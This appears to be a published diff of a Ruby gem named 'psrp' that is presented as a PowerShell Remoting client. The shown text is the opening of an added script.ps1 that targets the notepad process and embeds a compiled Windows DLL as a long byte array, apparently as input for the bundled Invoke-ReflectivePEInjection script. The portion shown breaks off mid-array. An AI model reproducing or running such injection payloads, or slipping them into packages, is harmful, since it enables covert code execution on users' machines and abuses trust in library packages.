psrp 0.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (26) hide show
  1. checksums.yaml +7 -0
  2. data/.gitignore +3 -0
  3. data/DemoDLL_RemoteProcess.dll +0 -0
  4. data/Invoke-ReflectivePEInjection.ps1 +2952 -0
  5. data/LICENSE +202 -0
  6. data/README.md +16 -0
  7. data/lib/psrp.rb +175 -0
  8. data/lib/response_handler.rb +134 -0
  9. data/lib/transport.rb +208 -0
  10. data/lib/version.rb +7 -0
  11. data/lib/wsmv/command_output_processor.rb +153 -0
  12. data/lib/wsmv/commands/base.rb +293 -0
  13. data/lib/wsmv/commands/close_shell.rb +48 -0
  14. data/lib/wsmv/commands/create_pipeline.rb +64 -0
  15. data/lib/wsmv/commands/init_runspace_pool.rb +92 -0
  16. data/lib/wsmv/commands/receive.rb +81 -0
  17. data/lib/wsmv/commands/send_data.rb +64 -0
  18. data/lib/wsmv/psrp_message.rb +289 -0
  19. data/lib/wsmv/templates/create_pipeline.xml.erb +93 -0
  20. data/lib/wsmv/templates/init_runspacepool.xml.erb +221 -0
  21. data/lib/wsmv/templates/runspace_availability.xml.erb +5 -0
  22. data/lib/wsmv/templates/session_capability.xml.erb +7 -0
  23. data/psrp.gemspec +39 -0
  24. data/script.ps1 +2945 -0
  25. data/test_psrp.rb +32 -0
  26. metadata +181 -0
data/script.ps1 ADDED
@@ -0,0 +1,2945 @@
1
+ $ProcName = notepad
2
+ $PEBytes = @(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,248,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,192,174,78,154,132,207,32,201,132,207,32,201,132,207,32,201,23,129,184,201,133,207,32,201,159,82,138,201,142,207,32,201,159,82,188,201,129,207,32,201,141,183,179,201,134,207,32,201,132,207,33,201,15,207,32,201,159,82,139,201,137,207,32,201,159,82,187,201,133,207,32,201,159,82,186,201,133,207,32,201,159,82,189,201,133,207,32,201,82,105,99,104,132,207,32,201,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,80,69,0,0,76,1,7,0,242,155,216,86,0,0,0,0,0,0,0,0,224,0,2,33,11,1,10,0,0,220,0,0,0,100,0,0,0,0,0,0,253,18,1,0,0,16,0,0,0,16,0,0,0,0,0,16,0,16,0,0,0,2,0,0,5,0,1,0,0,0,0,0,5,0,1,0,0,0,0,0,0,112,2,0,0,4,0,0,0,0,0,0,2,0,64,1,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,128,29,2,0,102,1,0,0,0,48,2,0,80,0,0,0,0,80,2,0,89,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,96,2,0,196,7,0,0,32,246,1,0,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,104,51,2,0,24,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,98,115,115,0,0,1,0,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,160,0,0,224,46,116,101,120,116,0,0,0,85,218,0,0,0,16,1,0,0,220,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,114,100,97,116,97,0,0,230,46,0,0,0,240,1,0,0,48,0,0,0,224,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,100,97,116,97,0,0,0,148,7,0,0,0,32,2,0,0,4,0,0,0,16,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192,46,105,100,97,116,97,0,0,116,27,0,0,0,48,2,0,0,28,0,0,0,20,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192,46,114,115,114,99,0,0,0,89,4,0,0,0,80,2,0,0,6,0,0,0,48,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,114,101,108,111,99,0,0,222,9,0,0,0,96,2,0,0,10,0,0,0,54,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,204,204,204,204,204,233,22,90,0,0,233,209,40,0,0,233,192,113,0,0,233,183,106,0,0,233,244,109,0,0,233,233,106,0,0,233,92,107,0,0,233,19,42,0,0,233,242,109,0,0,233,41,16,0,0,233,196,106,0,0,233,243,113,0,0,233,138,131,0,0,233,213,63,0,0,233,210,113,0,0,233,117,106,0,0,233,214,86,0,0,233,1,136,0,0,233,252,39,0,0,233,247,27,0,0,233,226,71,0,0,233,77,112,0,0,233,216,73,0,0,233,45,148,0,0,233,126,103,0,0,233,9,34,0,0,233,20,107,0,0,233,207,99,0,0,233,10,113,0,0,233,197,107,0,0,233,32,90,0,0,233,59,75,0,0,233,140,106,0,0,233,69,106,0,0,233,140,94,0,0,233,199,52,0,0,233,162,88,0,0,233,205,107,0,0,233,104,135,0,0,233,215,147,0,0,233,110,104,0,0,233,57,110,0,0,233,180,108,0,0,233,175,131,0,0,233,218,130,0,0,233,149,147,0,0,233,118,106,0,0,233,195,105,0,0,233,118,96,0,0,233,225,99,0,0,233,148,147,0,0,233,71,100,0,0,233,84,147,0,0,233,119,106,0,0,233,248,42,0,0,233,167,105,0,0,233,126,83,0,0,233,239,147,0,0,233,228,137,0,0,233,205,112,0,0,233,10,42,0,0,233,165,147,0,0,233,130,112,0,0,233,75,91,0,0,233,86,11,0,0,233,187,112,0,0,233,20,147,0,0,233,77,105,0,0,233,190,147,0,0,233,29,121,0,0,233,72,147,0,0,233,131,130,0,0,233,206,112,0,0,233,59,105,0,0,233,180,138,0,0,233,111,70,0,0,233,234,138,0,0,233,55,147,0,0,233,96,85,0,0,233,251,108,0,0,233,150,64,0,0,233,89,112,0,0,233,92,65,0,0,233,159,108,0,0,233,180,146,0,0,233,59,105,0,0,233,120,108,0,0,233,227,130,0,0,233,122,105,0,0,233,63,105,0,0,233,144,146,0,0,233,255,107,0,0,233,132,105,0,0,233,23,147,0,0,233,112,53,0,0,233,107,39,0,0,233,12,137,0,0,233,63,112,0,0,233,108,97,0,0,233,127,105,0,0,233,32,108,0,0,233,13,103,0,0,233,40,44,0,0,233,199,146,0,0,233,188,111,0,0,233,1,105,0,0,233,4,90,0,0,233,63,105,0,0,233,154,96,0,0,233,213,54,0,0,233,24,105,0,0,233,187,90,0,0,233,230,15,0,0,233,17,65,0,0,233,76,128,0,0,233,87,110,0,0,233,194,110,0,0,233,173,134,0,0,233,84,104,0,0,233,107,146,0,0,233,254,109,0,0,233,185,51,0,0,233,212,124,0,0,233,223,98,0,0,233,90,102,0,0,233,161,111,0,0,233,236,133,0,0,233,189,104,0,0,233,112,107,0,0,233,161,104,0,0,233,42,104,0,0,233,29,146,0,0,233,146,77,0,0,233,179,145,0,0,233,200,101,0,0,233,35,70,0,0,233,52,111,0,0,233,201,75,0,0,233,196,133,0,0,233,221,145,0,0,233,98,137,0,0,233,85,88,0,0,233,128,91,0,0,233,49,107,0,0,233,246,64,0,0,233,241,80,0,0,233,220,82,0,0,233,39,35,0,0,233,162,104,0,0,233,35,111,0,0,233,78,111,0,0,233,243,35,0,0,233,206,115,0,0,233,51,111,0,0,233,4,146,0,0,233,201,110,0,0,233,58,129,0,0,233,247,103,0,0,233,48,118,0,0,233,219,44,0,0,233,190,103,0,0,233,31,107,0,0,233,140,115,0,0,233,211,106,0,0,233,114,96,0,0,233,253,100,0,0,233,188,145,0,0,233,137,103,0,0,233,46,77,0,0,233,137,90,0,0,233,164,78,0,0,233,143,43,0,0,233,218,32,0,0,233,181,11,0,0,233,176,54,0,0,233,171,128,0,0,233,6,63,0,0,233,33,85,0,0,233,236,82,0,0,233,39,67,0,0,233,64,145,0,0,233,133,106,0,0,233,30,110,0,0,233,83,23,0,0,233,178,106,0,0,233,83,103,0,0,233,28,110,0,0,233,143,94,0,0,233,10,54,0,0,233,53,99,0,0,233,0,86,0,0,233,209,103,0,0,233,180,103,0,0,233,241,70,0,0,233,86,103,0,0,233,39,95,0,0,233,146,98,0,0,233,3,145,0,0,233,216,97,0,0,233,243,109,0,0,233,62,71,0,0,233,105,65,0,0,233,196,39,0,0,233,99,136,0,0,233,242,144,0,0,233,69,107,0,0,233,86,132,0,0,233,235,50,0,0,233,40,106,0,0,233,65,106,0,0,233,188,40,0,0,233,93,144,0,0,233,210,131,0,0,233,33,103,0,0,233,120,73,0,0,233,175,109,0,0,233,220,102,0,0,233,153,36,0,0,233,112,109,0,0,233,173,144,0,0,233,186,63,0,0,233,49,144,0,0,233,176,109,0,0,233,75,90,0,0,233,230,9,0,0,233,223,102,0,0,233,252,72,0,0,233,87,38,0,0,233,134,109,0,0,233,141,8,0,0,233,24,72,0,0,233,243,135,0,0,233,80,102,0,0,233,41,62,0,0,233,188,109,0,0,233,47,69,0,0,233,218,38,0,0,233,201,143,0,0,233,230,127,0,0,233,55,144,0,0,233,38,131,0,0,233,161,104,0,0,233,220,132,0,0,233,239,107,0,0,233,60,144,0,0,233,253,92,0,0,233,8,48,0,0,233,37,134,0,0,233,30,105,0,0,233,249,10,0,0,233,102,109,0,0,233,191,12,0,0,233,230,101,0,0,233,119,131,0,0,233,146,143,0,0,233,235,79,0,0,233,208,143,0,0,233,225,34,0,0,233,92,77,0,0,233,215,36,0,0,233,10,109,0,0,233,189,107,0,0,233,70,143,0,0,233,115,51,0,0,233,240,143,0,0,233,5,105,0,0,233,182,108,0,0,233,43,102,0,0,233,154,129,0,0,233,149,73,0,0,233,108,143,0,0,233,91,117,0,0,233,24,102,0,0,233,237,108,0,0,233,92,76,0,0,233,23,123,0,0,233,162,109,0,0,233,45,6,0,0,233,168,65,0,0,233,167,101,0,0,233,180,104,0,0,233,41,19,0,0,233,68,82,0,0,233,15,36,0,0,233,200,108,0,0,233,207,134,0,0,233,208,81,0,0,233,131,143,0,0,233,86,128,0,0,233,77,133,0,0,233,140,11,0,0,233,113,104,0,0,233,194,126,0,0,233,183,142,0,0,233,156,108,0,0,233,147,34,0,0,233,142,62,0,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,112,1,0,0,83,86,87,141,189,144,254,255,255,185,92,0,0,0,184,204,204,204,204,243,171,106,1,141,141,84,255,255,255,232,179,248,255,255,139,244,104,160,246,1,16,255,21,36,54,2,16,131,196,4,59,244,232,56,248,255,255,106,64,106,2,104,108,246,1,16,141,141,84,255,255,255,232,112,247,255,255,104,60,246,1,16,141,133,84,255,255,255,80,232,100,247,255,255,131,196,8,141,141,84,255,255,255,232,205,248,255,255,141,141,84,255,255,255,232,37,245,255,255,82,139,205,80,141,21,72,28,1,16,232,97,245,255,255,88,90,95,94,91,129,196,112,1,0,0,59,236,232,217,247,255,255,139,229,93,195,141,73,0,1,0,0,0,80,28,1,16,84,255,255,255,168,0,0,0,92,28,1,16,109,121,102,105,108,101,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,131,193,96,232,151,247,255,255,139,77,248,131,193,96,139,244,255,21,188,52,2,16,59,244,232,55,247,255,255,95,94,91,129,196,204,0,0,0,59,236,232,39,247,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,97,179,1,16,100,161,0,0,0,0,80,129,236,216,0,0,0,83,86,87,81,141,189,28,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,199,133,32,255,255,255,0,0,0,0,131,125,8,0,116,52,139,69,236,199,0,200,246,1,16,139,77,236,131,193,96,139,244,255,21,240,52,2,16,59,244,232,154,246,255,255,199,69,252,0,0,0,0,139,133,32,255,255,255,131,200,1,137,133,32,255,255,255,139,244,106,0,106,0,139,69,236,131,192,4,80,139,77,236,255,21,244,52,2,16,59,244,232,103,246,255,255,199,69,252,1,0,0,0,139,69,236,139,8,139,81,4,139,69,236,199,4,16,192,246,1,16,106,0,139,77,236,131,193,4,232,58,243,255,255,199,69,252,255,255,255,255,139,69,236,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,228,0,0,0,59,236,232,28,246,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,181,179,1,16,100,161,0,0,0,0,80,129,236,204,0,0,0,83,86,87,81,141,189,40,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,69,236,139,72,160,139,81,4,139,69,236,199,68,16,160,192,246,1,16,199,69,252,0,0,0,0,139,77,236,131,233,92,232,122,241,255,255,199,69,252,255,255,255,255,139,77,236,131,233,88,139,244,255,21,248,52,2,16,59,244,232,70,245,255,255,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,216,0,0,0,59,236,232,43,245,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,16,80,139,77,12,131,201,2,81,139,85,8,82,139,77,248,131,193,4,232,194,244,255,255,133,192,117,34,139,244,106,0,106,2,139,69,248,139,8,139,85,248,3,81,4,139,202,255,21,232,52,2,16,59,244,232,153,244,255,255,235,32,139,244,106,0,106,0,139,69,248,139,8,139,85,248,3,81,4,139,202,255,21,236,52,2,16,59,244,232,119,244,255,255,95,94,91,129,196,204,0,0,0,59,236,232,103,244,255,255,139,229,93,194,12,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,131,193,4,232,245,241,255,255,133,192,117,32,139,244,106,0,106,2,139,69,248,139,8,139,85,248,3,81,4,139,202,255,21,232,52,2,16,59,244,232,232,243,255,255,95,94,91,129,196,204,0,0,0,59,236,232,216,243,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,242,179,1,16,100,161,0,0,0,0,80,129,236,204,0,0,0,83,86,87,81,141,189,40,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,69,236,199,0,220,246,1,16,199,69,252,0,0,0,0,139,69,236,131,120,84,0,116,8,139,77,236,232,241,239,255,255,139,69,236,15,182,72,80,133,201,116,8,139,77,236,232,45,241,255,255,199,69,252,255,255,255,255,139,244,139,77,236,255,21,228,52,2,16,59,244,232,43,243,255,255,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,216,0,0,0,59,236,232,16,243,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,120,84,0,116,25,139,244,139,69,248,139,72,84,81,255,21,28,54,2,16,131,196,4,59,244,232,149,242,255,255,95,94,91,129,196,204,0,0,0,59,236,232,133,242,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,120,84,0,116,25,139,244,139,69,248,139,72,84,81,255,21,24,54,2,16,131,196,4,59,244,232,37,242,255,255,95,94,91,129,196,204,0,0,0,59,236,232,21,242,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,107,180,1,16,100,161,0,0,0,0,80,129,236,4,2,0,0,83,86,87,81,141,189,240,253,255,255,185,129,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,137,69,240,80,141,69,244,100,163,0,0,0,0,137,77,232,199,133,184,254,255,255,0,0,0,0,232,97,240,255,255,137,133,8,254,255,255,141,69,8,80,141,141,8,254,255,255,81,232,21,239,255,255,131,196,8,15,182,208,133,210,116,19,141,69,8,80,232,157,239,255,255,131,196,4,233,40,4,0,0,235,127,139,244,139,77,232,255,21,200,52,2,16,59,244,232,97,241,255,255,133,192,116,86,139,244,139,77,232,255,21,200,52,2,16,59,244,232,75,241,255,255,139,240,139,252,139,77,232,255,21,204,52,2,16,59,252,232,55,241,255,255,59,240,115,44,141,69,8,80,232,133,240,255,255,131,196,4,138,216,139,244,139,77,232,255,21,208,52,2,16,59,244,232,19,241,255,255,136,24,139,69,8,233,188,3,0,0,235,19,139,69,232,131,120,84,0,117,10,232,180,239,255,255,233,167,3,0,0,139,77,232,232,134,237,255,255,139,69,232,131,120,68,0,117,76,139,69,232,139,72,84,81,141,85,8,82,232,46,240,255,255,131,196,4,15,182,192,80,232,32,237,255,255,131,196,8,15,182,200,133,201,116,11,139,85,8,137,149,0,254,255,255,235,11,232,104,239,255,255,137,133,0,254,255,255,139,133,0,254,255,255,233,79,3,0,0,233,74,3,0,0,199,69,220,8,0,0,0,141,69,8,80,232,226,239,255,255,131,196,4,136,69,211,106,0,106,8,141,77,144,232,222,240,255,255,199,69,252,0,0,0,0,139,244,141,69,184,80,141,141,32,254,255,255,81,141,77,144,232,103,236,255,255,137,133,0,254,255,255,139,149,0,254,255,255,137,149,252,253,255,255,198,69,252,1,139,141,252,253,255,255,232,46,240,255,255,139,248,141,77,144,232,131,240,255,255,3,248,87,141,133,52,254,255,255,80,141,77,144,232,42,236,255,255,137,133,248,253,255,255,139,141,248,253,255,255,137,141,244,253,255,255,198,69,252,2,139,141,244,253,255,255,232,241,239,255,255,80,141,85,196,82,141,69,212,80,141,77,211,81,139,85,232,131,194,76,82,139,69,232,139,72,68,255,21,212,52,2,16,59,244,232,212,239,255,255,137,133,20,254,255,255,198,69,252,1,141,141,52,254,255,255,232,133,237,255,255,198,69,252,0,141,141,32,254,255,255,232,118,237,255,255,139,141,20,254,255,255,137,141,240,253,255,255,131,189,240,253,255,255,0,15,140,20,2,0,0,131,189,240,253,255,255,1,126,18,131,189,240,253,255,255,3,15,132,170,1,0,0,233,249,1,0,0,141,133,72,254,255,255,80,141,77,144,232,123,235,255,255,137,133,0,254,255,255,139,141,0,254,255,255,137,141,252,253,255,255,198,69,252,3,139,141,252,253,255,255,232,66,239,255,255,139,85,184,43,208,137,85,132,198,69,252,0,141,141,72,254,255,255,232,251,236,255,255,131,125,132,0,118,112,139,244,139,69,232,139,72,84,81,139,85,132,82,106,1,141,133,104,254,255,255,80,141,77,144,232,31,235,255,255,137,133,0,254,255,255,139,141,0,254,255,255,137,141,252,253,255,255,198,69,252,4,139,149,184,254,255,255,131,202,1,137,149,184,254,255,255,139,141,252,253,255,255,232,215,238,255,255,80,255,21,20,54,2,16,131,196,16,59,244,232,208,238,255,255,57,69,132,116,12,199,133,248,253,255,255,1,0,0,0,235,10,199,133,248,253,255,255,0,0,0,0,138,133,248,253,255,255,136,133,95,254,255,255,199,69,252,0,0,0,0,139,141,184,254,255,255,131,225,1,116,18,131,165,184,254,255,255,254,141,141,104,254,255,255,232,75,236,255,255,15,182,149,95,254,255,255,133,210,116,37,232,48,237,255,255,137,133,124,254,255,255,199,69,252,255,255,255,255,141,77,144,232,51,238,255,255,139,133,124,254,255,255,233,8,1,0,0,139,69,232,198,64,73,1,139,69,196,141,77,211,59,193,116,35,139,69,8,137,133,136,254,255,255,199,69,252,255,255,255,255,141,77,144,232,255,237,255,255,139,133,136,254,255,255,233,212,0,0,0,131,125,132,0,118,2,235,64,141,77,144,232,102,238,255,255,131,248,32,115,14,106,0,106,8,141,77,144,232,230,238,255,255,235,37,232,180,236,255,255,137,133,148,254,255,255,199,69,252,255,255,255,255,141,77,144,232,183,237,255,255,139,133,148,254,255,255,233,140,0,0,0,235,118,139,69,232,139,72,84,81,15,182,85,211,82,232,31,234,255,255,131,196,8,15,182,192,133,192,116,11,139,77,8,137,141,0,254,255,255,235,11,232,103,236,255,255,137,133,0,254,255,255,139,149,0,254,255,255,137,149,160,254,255,255,199,69,252,255,255,255,255,141,77,144,232,94,237,255,255,139,133,160,254,255,255,235,54,232,57,236,255,255,137,133,172,254,255,255,199,69,252,255,255,255,255,141,77,144,232,60,237,255,255,139,133,172,254,255,255,235,20,233,238,252,255,255,199,69,252,255,255,255,255,141,77,144,232,32,237,255,255,82,139,205,80,141,21,12,39,1,16,232,180,234,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,139,77,240,51,205,232,120,233,255,255,129,196,16,2,0,0,59,236,232,23,237,255,255,139,229,93,194,4,0,141,73,0,4,0,0,0,20,39,1,16,211,255,255,255,1,0,0,0,84,39,1,16,196,255,255,255,4,0,0,0,79,39,1,16,184,255,255,255,4,0,0,0,73,39,1,16,144,255,255,255,32,0,0,0,68,39,1,16,95,83,116,114,0,95,68,101,115,116,0,95,83,114,99,0,95,67,104,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,2